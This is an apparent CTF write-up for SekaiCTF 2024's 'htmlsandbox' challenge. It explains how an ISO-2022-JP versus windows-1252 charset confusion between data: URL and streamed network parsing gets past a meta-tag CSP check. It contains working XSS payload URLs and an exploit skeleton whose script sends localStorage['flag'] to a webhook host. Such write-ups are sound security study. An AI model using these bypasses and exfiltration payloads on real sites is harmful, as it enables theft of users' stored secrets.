Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

 Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem - htmlsandbox. This was quite a challenge. It was the least solved web problem with only 4 solves. However I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near arbitrary HTML. The only restriction is that the following JS functions must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably they forgot to include onfocusin in the check, but you don't actually need it for the challenge
     

 This is all evaluated at save time by converting the html to a data: url, passing it to pupeteer chromium with javascript and external requests disabled. If it passes this validation, the html document goes on the web server.

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal chrome instance with javascript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its LocalStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other javascript checks can easily be bypassed by either using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template> which hides the script tag from document.querySelector().

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts in the page (as script-src inherits from default-src)

Normally CSP is specified in an HTTP header. Putting it inside the html document does come with some caveats:

  • It must be in the <head>. If its in the <body> it is ignored.
  • It does not apply to <script> tags (or anything else) in the document present prior to the <meta> tag

So my first initial thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

 Turns out, the answer is no. Per the HTML5 spec. If you add some content before the head, it acts like you implicitly closed the <head> tag and started the body tag. No matter how you structure your document, the web browser fixes it up to be reasonable. You cannot put anything other then a comment (and DTDs/PIs) before the <head>.

I also thought about DOM cloberring, but it seemed pretty impossible given that document.querySelector() and === was used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if i redirect the page really quickly, maybe the checks would happen on a page I control.

The problem here is that network requests were disabled in puppeteer so I can't just redirect to some site I control. Chrome also disables meta redirection to data: urls (I guess they were a common phishing vector or something) so they are out. I can't use blob: urls as I have no javascript to create a blob url.

Similarly, if instead I try to delay the redirect until after validation has finished, I still have nowhere to redirect too, as I need some page with an XSS on the same origin in order to read the localStorage. Thus client side redirection was out.

Lots of dead ends here.

The hint

Since initially no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

Its a big spec, but it seemed like section 13.2 would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

So during the algorithm for determining a character encoding (charset), browsers can choose to only apply it to the first part of the document if all the bytes of the document are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets. For example, where the validator supports UTF-7 which has a non-ascii compatible encoding of <, but web browsers do not support it and interpret the document with an unknown charset as UTF-8.

However this is a bit different, since the web browser and ultimate viewer are the same program - both a web browser, both supporting the exact same charsets.

We need to find two character encodings that interpret the same document different ways - one with the CSP policy and one without, and have both character encodings be supported by modern web browsers.

What character sets can we even possibly specify? First off we can discard any encodings that always encode <, > and " the way ascii would which include all single-byte legacy encodings. Browsers have intentionally removed support for such encodings due to the problems caused by encodings like UTF-7 and HZ. Per the encoding standard, the only ones left are the following legacy multi-byte encodings: big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUR-KR, UTF-16BE, UTF-16LE.

Looking through their definitions in the encoding standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but with ISO-2022-JP, a series of bytes can affect the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but 3 encodings that can be switched between each other with a special code. When in ascii mode, the encoding looks like normal ascii. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purposes of creating a polygot document, as we can switch on and off the modes to change the meaning of a wide swath of text.

An Example

Note: throughout this post i will be using ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

The ^[$BNq sequence changes the charset mode to katakana, ^[(B changes it back to ASCII. Under windows-1252 these escape sequences are ignored, of course. Thus we have made a polygot document that will give an alert box only in windows-1252 mode.

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

 Note how the body of the url is exactly the same. The only thing that is different is the charset specified in the mime type of the url, which totally changes the interpretation.

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description - the validator loads the page via a data: url, which loads the full page instantly. The victim loads the page over the network.

In the network case, chrome will start parsing immediately and guess the charset before the entire document.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, add a charset declaration at the end for the other charset which makes the document look good. Browsers loading it all at once will see it as benign, browsers loading it over the network will see it as evil. This might look something like:

<html>
	<head>
    	<!-- é - Add a windows-1252 character to make sure early heurstics detect as windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - The browser sees the <meta charset="iso-2022-jp"> tag, processes the whole document in that charset. That means that the <script> tag is interpreted as an html comment in japanese, so is ignored
  • Over the network - The browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to try and determine the character encoding. It sees the é in windows-1252 encoding (We can use the same logic for UTF-8, but it seems the challenge transcodes things to windows-1252 as an artifact of naively using atob() function), and makes a guess that the encoding of the document is windows-1252. Later on it sees the <meta> tag, but it is too late at this point as part of the document is already parsed (note: It appears that chrome deviates from the HTML5 spec here. The HTML5 spec says if a late <meta> tag is encountered, the document should be thrown out and reparsed provided that is possible without re-requesting from the network. Chrome seems to just switch charset at the point of getting the meta tag and continue on parsing). The end result is the first part of the document is interpreted as windows-1252, allowing the <script> tag to be executed.

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out chrome will wait a certain amount of time before preceding with parsing a partial response. The HTML5 spec suggests this should be at least 1024 bytes or 500ms (Whichever is longer), but it is unclear what chrome actually does. Testing this on localhost of course makes the network much more efficient. The MTU of the loopback interface is 64kb, so each packet is much bigger. Everything also happens much faster, so the timeout is much less likely to be reached.

Thus i did another test, where i used a php script, but put <?php flush();sleep(1); ?> in the middle, to force a delay. This worked much better in my testing. Equivalently I probably could have just tested on the remote version of the challenge.

After several hours of trying to debug, I had thus realized I had solved the problem several hours ago :(. In any case the previous snippet worked when run on the remote.

Conclusion

 This was a really fun challenge. It had me reading the HTML5 spec with a fine tooth comb, as well as making many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

 And yet, Chrome had significant deviations from the spec. For example, <meta> tags (after pre-scan) are supposed to be ignored in <noscript> tags when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore it, but according to other contestants chrome does neither and instead switches midstream.

Thanks to project Sekai for hosting a great CTF.